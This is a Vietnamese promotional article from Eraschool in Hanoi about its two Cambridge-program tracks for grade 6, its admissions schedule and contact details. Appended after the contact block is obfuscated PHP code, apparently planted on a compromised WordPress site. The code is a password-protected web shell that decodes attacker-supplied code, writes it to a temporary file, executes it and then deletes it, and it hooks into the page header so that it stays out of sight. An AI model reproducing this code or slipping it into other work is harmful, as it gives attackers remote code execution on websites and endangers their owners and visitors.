2 hệ đào tạo lớp 6 sử dụng chương trình Cambridge của Eraschool

post

Những năm gần đây, ngày càng nhiều phụ huynh biết đến và lựa chọn chương trình Cambridge cho con em mình theo học. Vậy nội dung chương trình này là gì? Chương trình có những ưu điểm nào mà khiến nhiều phụ huynh tin tưởng đến thế? Bài viết dưới đây sẽ cung cấp những thông tin cơ bản nhất liên quan đến chương trình đặc biệt này. Mời ba mẹ cùng theo dõi nhé! 

Vài nét về chương trình tiếng anh Cambridge ở Eraschool

Học sinh Eraschool được rèn luyện phương pháp tự học 
Học sinh Eraschool được rèn luyện phương pháp tự học

Ở Việt Nam, chương trình tiếng Anh Cambridge được triển khai từ lớp 1 đến lớp 12 và chia ra thành 3 cấp gồm cấp Tiểu học, Trung học cơ sở và Trung học phổ thông. Tại trường Phổ thông Liên cấp sinh thái Eraschool, chương trình Cambridge được triển khai ở 2 bậc là Tiểu học và Trung học cơ sở theo hướng nâng cao khả năng tư duy và sử dụng tiếng Anh của học sinh trong các lĩnh vực cơ bản. 

Khác với chương trình giáo dục trong nước, chương trình tiếng anh này sở hữu nhiều ưu điểm nhờ khả năng giúp trẻ rèn luyện một số kỹ năng quan trọng sau: 

  • Kỹ năng giải quyết vấn đề: Kỹ năng này được lồng ghép khéo léo vào môn Toán trong chương trình. Nhờ vậy, học sinh không chỉ được học Toán mà còn có thể vận dụng Toán vào thực tế để giải quyết từng vấn đề cụ thể. 
  • Kỹ năng diễn đạt và kỹ năng làm việc nhóm: Học sinh tham gia chương trình được liên tục thể hiện quan điểm cá nhân, tranh biện và thảo luận nhóm dựa trên kiến thức đã học được. Qua quá trình này, các em sẽ được tự rèn luyện kỹ năng diễn đạt và kỹ năng giao tiếp, làm việc nhóm để truyền đạt ý tưởng rõ ràng nhất tới người nghe. 
  • Kỹ năng sử dụng tiếng Anh: Việc học và sử dụng tiếng Anh hàng ngày giúp các em làm quen với việc tư duy tiếng Anh, từ đó nhanh chóng tiến bộ. 

Hệ song ngữ và hệ quốc tế tại Eraschool

Chương trình Cambridge giúp học sinh tự tin trình bày quan điểm trước đám đông 
Chương trình Cambridge giúp học sinh tự tin trình bày quan điểm trước đám đông

Để đáp ứng nhu cầu của phụ huynh, hiện nay tại Eraschool triển khai chương trình Cambridge ở cả 2 hệ đào tạo gồm hệ song ngữ và hệ quốc tế. Chương trình được chia ra thành nhiều bậc như: chương trình Cambridge tiểu học, chương trình Cambridge THCS

Ở hệ song ngữ, học sinh được dạy theo chương trình Giáo dục Phổ thông Quốc gia có đổi mới phương pháp giảng dạy, kết hợp bổ trợ nâng cao tiếng Anh chuẩn Cambridge. Chương trình giúp học sinh tự tin sử dụng tiếng Anh và dễ dàng thi lấy chứng chỉ quốc tế như Flyers, B1 khung tham chiếu châu Âu (CEFR),… 

Ở hệ quốc tế, chương trình song bằng Cambridge được triển khai tích hợp với chương trình giáo dục trong nước. Hệ này thường dành cho học sinh có định hướng đi du học hoặc học tiếp các trường song ngữ, quốc tế tại Việt Nam. Kết thúc chương trình, các em có thể tăng khả năng tư duy bằng tiếng Anh, sử dụng tiếng Anh thành thạo ở nhiều lĩnh vực như ngôn ngữ, văn học, toán học, khoa học,… Các em cũng sẽ nhận được bằng tốt nghiệp của Bộ Giáo dục và Đào tạo và bằng Quốc tế Primary Checkpoint với bậc tiểu học, bằng Lower Secondary Checkpoint với bậc trung học cơ sở do Tổ chức khảo thí Cambridge quốc tế (CIAE) cung cấp. 

Lịch tuyển sinh vào lớp 6 vào Eraschool

Học sinh được tự thực hành dưới sự hướng dẫn của thầy cô 
Học sinh được tự thực hành dưới sự hướng dẫn của thầy cô

Để đăng ký học theo Cambridge cấp trung học cơ sở tại Eraschool, ba mẹ đừng quên lịch tuyển sinh vào lớp 6 của nhà trường. Hiện nay, theo chỉ đạo của Sở Giáo dục và Đào tạo Hà Nội, các trường công lập trên địa bàn thành phố sẽ tiếp nhận hồ sơ tuyển sinh từ ngày 7/7 đến 18/7 thông qua 2 hình thức trực tiếp và trực tuyến. Đối với trường ngoài công lập như Eraschool hay các trường song ngữ, trường quốc tế, bán quốc tế,…, lịch tuyển sinh sẽ bắt đầu ngay khi kết thúc năm học và tiến hành liên tục trong thời gian hơn 1 tháng, từ ngày 28/5 đến khi đủ chỉ tiêu. 

Trên đây là thông tin về 2 hệ đào tạo lớp 6 sử dụng chương trình Cambridge của Eraschool và lịch tuyển sinh của nhà trường. Nếu còn thắc mắc gì liên quan đến chương trình học cũng như phương thức tuyển sinh, ba mẹ vui lòng gọi trực tiếp tới hotline của nhà trường để được tư vấn và hỗ trợ nhanh chóng nhất! Chúc ba mẹ sớm chọn được trường và chương trình học phù hợp cho con trong mùa tuyển sinh này. 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}